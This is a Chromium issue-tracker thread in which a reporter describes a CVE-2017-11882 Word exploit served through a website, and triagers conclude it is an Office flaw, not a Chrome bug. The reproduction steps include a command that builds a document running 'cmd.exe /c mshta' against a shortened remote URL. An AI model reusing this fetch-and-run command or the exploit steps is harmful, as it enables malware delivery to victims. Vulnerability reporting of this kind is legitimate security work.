Issue metadata
Sign in to add a comment
|
Security: Upload file Exploit and run Script file
Reported by
sitthipo...@gmail.com,
Dec 2 2017
|
||||||||||||||||||||
Issue descriptionDETAILS Upload file Microsoft Word (Eeploit CVE-2017-11882) to web site for Web browser and run script Exploit VERSION Chrome Version: [62.0.3202.94] + [stable] Operating System: [windows 10 Pro OS, version 1607 for x64-based Systems (KB4051033) (turn off Windows Defender)] REPRODUCTION CASE 1. Up file Exploit.html and file calc.exe to web site Ex: https://stp5940pentester.000webhostapp.com/Exploit.html 2. Short url for https://goo.gl Ex: https://stp5940pentester.000webhostapp.com/Exploit.html to https://goo.gl/FjZRtY 3. Open cmd Run file Command109b_CVE-2017-11882.py Ex: Command109b_CVE-2017-11882.py -c "cmd.exe /c mshta https://goo.gl/FjZRtY" -o Hello.doc 4. Upload file to https://www.virustotal.com FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: [ Run script Exploit ] Demo: https://youtu.be/ar0LMC_Ig2w Crash State: Google Chrome Version 62.0.3202.94 : Success Mozilla Firefox Version 57.0.1 : Success Opera Version 49.0.2725.47 : Success microsoft edge : unsuccessful
,
Dec 3 2017
Use as you say. Who should I report this problem to?
,
Dec 3 2017
Thank you for providing more feedback. Adding requester "elawrence@chromium.org" to the cc list and removing "Needs-Feedback" label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 3 2017
elawrence: do you know if this is a known issue in Microsoft Office then?
,
Dec 3 2017
My assumption based on the text above is that the Windows shell previewer is also vulnerable to CVE-2017-11882 and that patch resolves the issue. But I do not know.
,
Dec 3 2017
But it sounds like, in any case, this is not a bug in Chrome. Is that right?
,
Dec 4 2017
Original Reporter: If you install Microsoft's patch for CVE-2017-11882, does this issue continue to reproduce? Do you see the same behavior if you click File > Open inside another application (e.g. Notepad) and select the trojan document?
,
Dec 4 2017
RE #6: Correct, I'm almost positive that this isn't a bug in Chrome and is instead a bug in the Office previewer dll. If the reporter replies to #7 and notes that it's still reproducing after installing the Office patch, we should work together to disclose to secure@microsoft.com
,
Dec 5 2017
This is not an issue in Chrome. Original Reporter, please see #7. If you can reproduce this with the patch from Microsoft installed, please let me know and I'll help further.
,
Mar 14 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, Dec 3 2017